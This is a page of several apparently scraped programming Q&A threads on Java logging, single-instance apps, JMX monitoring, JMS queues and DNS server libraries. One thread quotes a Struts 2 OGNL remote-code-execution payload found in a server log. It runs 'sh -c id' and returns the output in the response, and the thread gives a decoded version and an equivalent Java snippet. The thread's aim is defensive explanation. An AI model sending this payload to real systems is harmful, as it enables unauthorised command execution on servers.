We have a service running on n hosts behind a VIP. When a fault occurs for a specific request, we may want to find the reason by looking at the logs on the host where the fault occurred. Since the request could go to any host, we need to know which host the fault originated on before we can track down the logs.
One solution is to store the host name in the database of our service along with other information.
The alternative is to push the logs onto a common store and trace them there.
I personally feel that if we go with the first approach, we might end up adding many such debugging-related attributes to the application database, thereby polluting it. However, the second option is not that easy to implement either and incurs some overhead. Moreover, knowing which host the fault occurred on does not help much unless the fault was caused by some hardware-specific issue.
What do you guys suggest?
Without knowing more about your infrastructure, it's hard to be precise, but here are some general points of view.
I don't like using databases for storing application logs - if the database falls over, you wouldn't be able to log it! It's also not really relational data, and you can't get the monitoring tools that are available for other solutions.
My recommendation is to use your operating system's built-in event logging solution; most logging frameworks support this out of the box. On Windows, that's the event log; on *nix there's the syslog system. Logging should be quick, cheap, and bulletproof - that's what you get from the OS tools.
The second question is then how you use those logs for troubleshooting and monitoring. There are lots of tools for doing this, though mostly aimed at system administrators rather than developers. Microsoft have MOM, there's Tivoli and Big Brother - as well as a whole bunch of open source tools. I'd use those rather than build your own solution.
The key point is - logging should be fast, cheap and robust; the analysis and monitoring stuff should be entirely separate from your application logic, so you can reuse the tools and processes across multiple projects.
Storing the hostname should be quite cheap, I guess. I understand you are appending logs to a db?
You could also store the pid of each process; that helps in case you have multiple processes running on the same host. The combination hostname/pid/timestamp will let you uniquely identify a process.
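For what it's worth, capturing those values inside the JVM is cheap. A minimal sketch with plain java.util.logging (the request id and log message are made up for illustration):

    import java.net.InetAddress;
    import java.util.UUID;
    import java.util.logging.Logger;

    public class RequestLogContext {
        private static final Logger LOG = Logger.getLogger(RequestLogContext.class.getName());

        public static void main(String[] args) throws Exception {
            String host = InetAddress.getLocalHost().getHostName(); // host that handled the request
            long pid = ProcessHandle.current().pid();               // process id (Java 9+)
            String requestId = UUID.randomUUID().toString();        // correlates log lines per request

            // Prefix every log line with host/pid/request id so a fault can be traced
            // back to the machine and process that handled it.
            LOG.info(String.format("[%s/%d/%s] payment request failed: timeout", host, pid, requestId));
        }
    }

If every line carries that prefix, the log record itself tells you which host and process to look at, whichever store the logs end up in.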
Related
I'm developing an application (Java & JavaFX) that writes/reads data (a file). The problem is I don't want to restrict the user to running only one instance (of my app) at a time, as I really can't think of a reliable way of doing that which works on both Windows and Linux (e.g. a server); I've heard of sockets and files - both are defective IMO. Since the user is able to run multiple instances, writing/reading data (from a file) seems really messy, because there's no guarantee that file locking will work reliably on both Windows and Linux (see the FileLock documentation).
To sum up: I can't restrict multiple instances of my app, but that leads to problem with writing/reading data (from a file).
Is there anything I missed? Maybe there's some other way to solve my problem I can't think of? How do the "big" popular programs handle that?
Suggested: Use a socket solution
You could follow the techniques outlined in an answer to:
JavaFX Single Instance Application
FAQ
Addressing some additional questions:
heard of sockets and files - both are defective IMO.
You state your opinion that using sockets to set up a single instance application won’t work well enough for you. You are in the best position to decide that.
For some apps which want to achieve a single instance, the socket-based or file-based solution outlined in the answer to the linked question or other comments will work well enough.
"What happens if more than one user try to run the application? Won't they conflict on opening the socket?"
Prevent launching multiple instances of a java application
And:
Also, I can't be sure if chosen port (fixed, since all instances should check for one port) is being used by some other applications/processes
You may be able to address some of these concerns by enhancing the socket-based solutions outlined in the linked questions.
Enhanced Socket Solution Outline
If you want, you can write an enhanced algorithm to deal with some of these issues (a rough sketch in code follows this outline).
When another app instance startup occurs, you try to connect to a current instance on a well-known socket.
Check the response to the connection.
If it doesn’t respond with the correct protocol response (e.g. matching user and app name) then increment the port by 2 and retry.
Test the response again until either:
You get a match for the app/user combo, then send a signal to that app to display itself.
OR
If you get no match, then create a new instance on the tested open port.
I'm not suggesting you do that, just explaining that it is possible.
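For concreteness, here is a minimal, untested sketch of that outline. The base port, the token format and the "SHOW" command are assumptions made up for illustration; a real implementation would need proper error handling and a way to actually bring the existing window to the front.

    import java.io.*;
    import java.net.*;
    import java.nio.charset.StandardCharsets;

    public class SingleInstanceGuard {
        private static final int BASE_PORT = 48620;   // hypothetical well-known starting port
        private static final int MAX_PROBES = 10;
        private static final String TOKEN =
                "my-app:" + System.getProperty("user.name");  // app/user combo to match

        public static void main(String[] args) throws IOException {
            for (int i = 0; i < MAX_PROBES; i++) {
                int port = BASE_PORT + 2 * i;              // increment the port by 2 and retry
                if (signalExistingInstance(port)) {
                    System.out.println("Another instance answered on port " + port + "; exiting.");
                    return;
                }
                ServerSocket server = tryBind(port);
                if (server != null) {
                    System.out.println("No matching instance found; listening on port " + port);
                    listen(server);                        // block here, answering future probes
                    return;
                }
                // Port is in use by an unrelated process; probe the next candidate.
            }
            System.err.println("Gave up probing; starting without the single-instance guard.");
        }

        /** Returns true if whatever listens on this port answers with our app/user token. */
        private static boolean signalExistingInstance(int port) {
            try (Socket s = new Socket("localhost", port)) {
                s.setSoTimeout(1000);
                BufferedReader in = new BufferedReader(
                        new InputStreamReader(s.getInputStream(), StandardCharsets.UTF_8));
                PrintWriter out = new PrintWriter(
                        new OutputStreamWriter(s.getOutputStream(), StandardCharsets.UTF_8), true);
                if (TOKEN.equals(in.readLine())) {
                    out.println("SHOW");                   // ask the existing instance to show itself
                    return true;
                }
            } catch (IOException ignored) {
                // Nothing (or something incompatible) is listening here.
            }
            return false;
        }

        private static ServerSocket tryBind(int port) {
            try {
                return new ServerSocket(port, 10, InetAddress.getLoopbackAddress());
            } catch (IOException e) {
                return null;                               // taken by some other application
            }
        }

        private static void listen(ServerSocket server) throws IOException {
            while (true) {
                try (Socket client = server.accept()) {
                    PrintWriter out = new PrintWriter(
                            new OutputStreamWriter(client.getOutputStream(), StandardCharsets.UTF_8), true);
                    BufferedReader in = new BufferedReader(
                            new InputStreamReader(client.getInputStream(), StandardCharsets.UTF_8));
                    out.println(TOKEN);                    // identify ourselves first
                    if ("SHOW".equals(in.readLine())) {
                        System.out.println("Bring the existing window to the front here.");
                    }
                }
            }
        }
    }

A port that is open but answers with the wrong token is treated as belonging to some other application, which is how the sketch deals with the concern about the port already being used by something else.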
Alternative: OS native service
There are also other OS-specific mechanisms for handling this, such as Windows or Linux services, which you can investigate if you want. Those approaches are involved and vary by OS, so I won't discuss them in detail here.
For the OS-specific solutions, you usually would:
Create a native package for your app (e.g. using jpackage)
Install it.
Have the installer configure the app as a service
e.g. on Linux, create an init.d script with a pid file, configured via chkconfig.
The service launches on boot and stops on shutdown.
The app is then accessed via a tray icon or something similar
The means of interaction is often OS version specific.
Alternative: Allow multiple app instances but use a single database instance
You may also consider using a database rather than files for data storage, as a database can solve many of the concurrent-access issues which arise with file-based solutions. Multiple clients can connect to the database, and the database and your app code can handle locks and collisions on data access to ensure data integrity is maintained. With such a solution there is no need to enforce a single running application instance per user (at least from a data integrity perspective).
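As a rough illustration of that idea, each running instance simply opens its own connection to the shared database and lets transactions deal with concurrent writers. The connection URL, credentials and table below are placeholders:

    import java.sql.*;

    public class SharedStore {
        // Placeholder connection string; in practice this points at a shared database
        // server (or an embedded database such as H2 running in server mode).
        private static final String URL = "jdbc:postgresql://dbhost:5432/myapp";

        public static void addEntry(String owner, String body) throws SQLException {
            try (Connection con = DriverManager.getConnection(URL, "app", "secret")) {
                con.setAutoCommit(false);                // group the work into one transaction
                try (PreparedStatement ps = con.prepareStatement(
                        "INSERT INTO entries(owner, body, created_at) VALUES (?, ?, ?)")) {
                    ps.setString(1, owner);
                    ps.setString(2, body);
                    ps.setTimestamp(3, new Timestamp(System.currentTimeMillis()));
                    ps.executeUpdate();
                }
                con.commit();                            // the database serializes concurrent writers
            }
        }
    }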
In my server log of my web server, I've noticed a hacker trying this:
https://[domain name]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}
Which URL decodes to this:
https://[domain name]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}
My server doesn't use Java, but I'm trying to understand what this hacker is trying to do here and why this could be a vulnerability. After all, I'm not just a developer; I also need to know how to protect a server, including servers not set up by me.
Code seems to start a new process and then tries to read data from the input stream. I'm assuming this is the input stream of the current web session.
As this attack is also tried against /login.action and various other URLs with different Java code, I consider it potentially dangerous. But I can't explain why it is dangerous.
The specific domain is under attack right now as the hacker tries to see if it's running WordPress, Magento or other well-known systems, and also tries several different attacks.
But what matters is this: the domain is currently under development and the owner still has to decide which development tools will be used. The choice is between Java and ASP.NET, so would this attack be dangerous if he picks Java?
It's trying to exploit an RCE vulnerability in Struts 2, I think this one. It's a bad one: Freemarker would execute any code inside ${} tags.
The Freemarker code starts a process to execute id to see if the server is running as root, giving full access to the box. Even a vulnerable Struts version might not be too bad here, since the attacker might not be interested unless you were root.
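Stripped of the expression-language wrapping, the decoded payload is roughly equivalent to the plain Java below. Note that the stream being read is the stdout of the spawned id process, not the web session; the real payload then writes that output into the HttpServletResponse rather than to the console:

    import java.io.BufferedReader;
    import java.io.InputStreamReader;

    public class PayloadEquivalent {
        public static void main(String[] args) throws Exception {
            // Start "sh -c id" exactly as the injected expression does...
            Process p = new ProcessBuilder("sh", "-c", "id").start();
            // ...then read the command's output from the child process's input stream.
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);   // the attacker sends this back in the HTTP response
            }
        }
    }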
The attacker's program tries a lot of these old vulnerabilities, which only work on very poorly secured servers, but even basic administrative hygiene will protect against these amateur attacks. You would only be vulnerable if you were running as root, using an old version of the software, opening up your db server to the internet with a weak or default password, etc.
Regardless of the technology you choose, there will be security issues and you need to follow the CVEs. For example a modern Java framework like Spring has a few, but remote code execution is quite rare, and that's what those attack programs look for.
I'm looking for some simple ways to add hooks into my Java backend code, such as counters or other kinds of values. These values should be easily accessible via a URL or API for monitoring or health checks. Are there also tools to trigger an alert based on an unwanted condition that has arisen in the server?
(Based on my and Gilbert's comments.)
First of all, there is no magic bullet solution. The actual work of gathering statistics, status values and the detection of "unwanted conditions" (or anomalous events) is down to the application code.
However, there are some standard approaches to getting hold of this kind of information from a running application.
Instead of exposing the stats and status info via HTTP(S), you could use JMX to expose them, and use off-the-shelf JMX console software to access them.
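As a minimal sketch of the JMX route: you register a standard MBean with the platform MBean server, and the counter becomes visible in any JMX console (jconsole, VisualVM, etc.). The bean name and counter below are made-up examples:

    // AppStatsMBean.java - the management interface exposed over JMX
    public interface AppStatsMBean {
        long getRequestCount();
    }

    // AppStats.java - the application-side implementation
    import java.lang.management.ManagementFactory;
    import javax.management.MBeanServer;
    import javax.management.ObjectName;

    public class AppStats implements AppStatsMBean {
        private volatile long requestCount;

        @Override
        public long getRequestCount() { return requestCount; }

        public void increment() { requestCount++; }

        public static void main(String[] args) throws Exception {
            AppStats stats = new AppStats();
            MBeanServer server = ManagementFactory.getPlatformMBeanServer();
            server.registerMBean(stats, new ObjectName("com.example.app:type=AppStats"));
            while (true) {                 // stand-in for real application work
                stats.increment();
                Thread.sleep(1000);
            }
        }
    }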
The "unwanted conditions" / anomalous events requirement could be handled by using an off-the-shelf logging library. You then use an off-the-shelf external monitoring tool / system to scan for events and generate notifications.
Is it worth the effort? Depends on the nature of the server. (And on how much effort you can avoid by using monitoring infrastructure paid for or run by someone else.)
In production we have multiple containers deployed, and any one of them can be a consumer of a JMS queue. In our development environment, we have multiple developers, each with a container that will potentially consume messages. When a developer wants to test something JMS-related by putting something on the queue, though, the message is often consumed by someone else, which can be a time sink.
We use the same build files for every environment. We do not want to accidentally deploy something to an upper environment that is meant strictly for the development environment.
What is a best practice in handling something like this that will not involve build tokens, etc or building differently for different environments?
We currently have the developer ask the other developers to comment out the consuming code, but this is a risk as the commented out code could accidentally get checked in.
One potential way would be to store a property in the database that would change from environment to environment.
How have you handled this?
The way I've seen this done is for each developer to have their own topic, specific to their local dev environment. This obviously depends on the developer having some control over the producer, so I'm not sure if it is viable for you.
You don't need build tokens to do this, but tokens do make things a lot nicer for local setup/configuration. I am quite surprised that you are able to use the same build files with no tokenization across every environment; I don't think I've ever worked on such a system.
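One low-tech way I've seen the per-developer idea wired up without touching the build is to derive the destination name from a property that is only set on developer machines, so shared and production environments fall back to the plain name. The queue name, property name and the source of the ConnectionFactory below are assumptions for illustration:

    import javax.jms.*;

    public class DevScopedConsumer {
        public static MessageConsumer createOrdersConsumer(ConnectionFactory factory) throws JMSException {
            // On a developer box, -Ddev.queue.suffix=alice yields "orders.alice";
            // everywhere else the property is absent and the shared "orders" queue is used.
            String suffix = System.getProperty("dev.queue.suffix", "");
            String queueName = suffix.isEmpty() ? "orders" : "orders." + suffix;

            Connection connection = factory.createConnection();
            Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
            Queue queue = session.createQueue(queueName);
            connection.start();
            return session.createConsumer(queue);
        }
    }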
Is there an already-written Java DNS server that only implements authoritative responses? I would like to take the source code and move it into a DNS server we will be developing that will use custom rule sets to decide what TTL to use and what IP address to publish.
The server will not be a caching server. It will only return authoritative results and will only be published in the WHOIS record for the domains. It will never be called directly.
The server will have to publish MX records, A records and SPF/TXT records. The plan is to use DNS to assist in load balancing among gateway servers in multiple locations (we are aware that DNS has a short reach in this area). It will also cease to publish the IP addresses of gateway servers when they go down, on purpose or by accident (granted, DNS will only be able to help during extended outages).
We will write the logic for all this ourselves, but I would very much like to start with a DNS server that has been through a little testing instead of starting from scratch.
However, that is only feasible if what we copy from is simple enough. Otherwise, it could turn out to be a waste of time.
George,
I guess what you need is a Java library which implements the DNS protocol.
Take a look at dnsjava
It is very good in terms of complete spec coverage of all record types and classes.
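To give a feel for the API, constructing the record types you mention takes only a few lines with dnsjava; the names, TTLs and addresses below are placeholders, and the library also has Zone and resolver classes you could build the authoritative logic on top of:

    import java.net.InetAddress;
    import org.xbill.DNS.*;

    public class DnsjavaRecordsDemo {
        public static void main(String[] args) throws Exception {
            Name zone = Name.fromString("example.com.");       // absolute names end with a dot
            Record a = new ARecord(Name.fromString("gw1.example.com."),
                    DClass.IN, 60, InetAddress.getByName("192.0.2.10"));
            Record mx = new MXRecord(zone, DClass.IN, 3600, 10,
                    Name.fromString("mail.example.com."));
            Record txt = new TXTRecord(zone, DClass.IN, 3600, "v=spf1 mx -all");

            // Records print in standard master-file format.
            System.out.println(a);
            System.out.println(mx);
            System.out.println(txt);
        }
    }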
But the issue which you might face with a Java-based library is performance. DNS servers are expected to have high throughput, although you can address that by throwing more hardware at it. If performance is a concern for you, I would suggest looking into Unbound.
http://www.xbill.org/dnsjava/
Unfortunately, the documentation states: "jnamed should not be used for production, and should probably not be used for testing. If the above documentation is not enough, please do not ask for more, because it really should not be used."
I'm not aware of any better alternatives, however.
You could take a look at Eagle DNS:
http://www.unlogic.se/projects/eagledns
It's been around for a few years and it's quite well tested by now.